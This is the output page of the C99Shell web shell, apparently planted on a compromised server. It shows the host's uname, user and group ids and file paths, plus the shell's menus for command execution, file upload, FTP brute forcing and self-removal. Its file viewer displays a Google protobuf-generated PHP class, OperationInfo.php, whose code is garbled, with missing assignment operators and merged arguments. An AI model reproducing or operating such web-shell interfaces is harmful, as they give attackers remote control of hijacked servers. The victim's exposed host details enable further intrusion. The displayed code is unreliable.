!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.qr.picotech.app/public_html/vendor/google/longrunning/src/LongRunning/   drwxr-xr-x
Free 29.16 GB of 117.98 GB (24.71%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     OperationInfo.php (5.14 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: google/longrunning/operations.proto

namespace Google\LongRunning;

use 
Google\Protobuf\Internal\GPBType;
use 
Google\Protobuf\Internal\RepeatedField;
use 
Google\Protobuf\Internal\GPBUtil;

/**
 * A message representing the message types used by a long-running operation.
 * Example:
 *     rpc Export(ExportRequest) returns (google.longrunning.Operation) {
 *       option (google.longrunning.operation_info) = {
 *         response_type: "ExportResponse"
 *         metadata_type: "ExportMetadata"
 *       };
 *     }
 *
 * Generated from protobuf message <code>google.longrunning.OperationInfo</code>
 */
class OperationInfo extends \Google\Protobuf\Internal\Message
{
    
/**
     * Required. The message name of the primary return type for this
     * long-running operation.
     * This type will be used to deserialize the LRO's response.
     * If the response is in a different package from the rpc, a fully-qualified
     * message name must be used (e.g. `google.protobuf.Struct`).
     * Note: Altering this value constitutes a breaking change.
     *
     * Generated from protobuf field <code>string response_type = 1;</code>
     */
    
private $response_type '';
    
/**
     * Required. The message name of the metadata type for this long-running
     * operation.
     * If the response is in a different package from the rpc, a fully-qualified
     * message name must be used (e.g. `google.protobuf.Struct`).
     * Note: Altering this value constitutes a breaking change.
     *
     * Generated from protobuf field <code>string metadata_type = 2;</code>
     */
    
private $metadata_type '';

    
/**
     * Constructor.
     *
     * @param array $data {
     *     Optional. Data for populating the Message object.
     *
     *     @type string $response_type
     *           Required. The message name of the primary return type for this
     *           long-running operation.
     *           This type will be used to deserialize the LRO's response.
     *           If the response is in a different package from the rpc, a fully-qualified
     *           message name must be used (e.g. `google.protobuf.Struct`).
     *           Note: Altering this value constitutes a breaking change.
     *     @type string $metadata_type
     *           Required. The message name of the metadata type for this long-running
     *           operation.
     *           If the response is in a different package from the rpc, a fully-qualified
     *           message name must be used (e.g. `google.protobuf.Struct`).
     *           Note: Altering this value constitutes a breaking change.
     * }
     */
    
public function __construct($data NULL) {
        
\GPBMetadata\Google\Longrunning\Operations::initOnce();
        
parent::__construct($data);
    }

    
/**
     * Required. The message name of the primary return type for this
     * long-running operation.
     * This type will be used to deserialize the LRO's response.
     * If the response is in a different package from the rpc, a fully-qualified
     * message name must be used (e.g. `google.protobuf.Struct`).
     * Note: Altering this value constitutes a breaking change.
     *
     * Generated from protobuf field <code>string response_type = 1;</code>
     * @return string
     */
    
public function getResponseType()
    {
        return 
$this->response_type;
    }

    
/**
     * Required. The message name of the primary return type for this
     * long-running operation.
     * This type will be used to deserialize the LRO's response.
     * If the response is in a different package from the rpc, a fully-qualified
     * message name must be used (e.g. `google.protobuf.Struct`).
     * Note: Altering this value constitutes a breaking change.
     *
     * Generated from protobuf field <code>string response_type = 1;</code>
     * @param string $var
     * @return $this
     */
    
public function setResponseType($var)
    {
        
GPBUtil::checkString($varTrue);
        
$this->response_type $var;

        return 
$this;
    }

    
/**
     * Required. The message name of the metadata type for this long-running
     * operation.
     * If the response is in a different package from the rpc, a fully-qualified
     * message name must be used (e.g. `google.protobuf.Struct`).
     * Note: Altering this value constitutes a breaking change.
     *
     * Generated from protobuf field <code>string metadata_type = 2;</code>
     * @return string
     */
    
public function getMetadataType()
    {
        return 
$this->metadata_type;
    }

    
/**
     * Required. The message name of the metadata type for this long-running
     * operation.
     * If the response is in a different package from the rpc, a fully-qualified
     * message name must be used (e.g. `google.protobuf.Struct`).
     * Note: Altering this value constitutes a breaking change.
     *
     * Generated from protobuf field <code>string metadata_type = 2;</code>
     * @param string $var
     * @return $this
     */
    
public function setMetadataType($var)
    {
        
GPBUtil::checkString($varTrue);
        
$this->metadata_type $var;

        return 
$this;
    }

}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--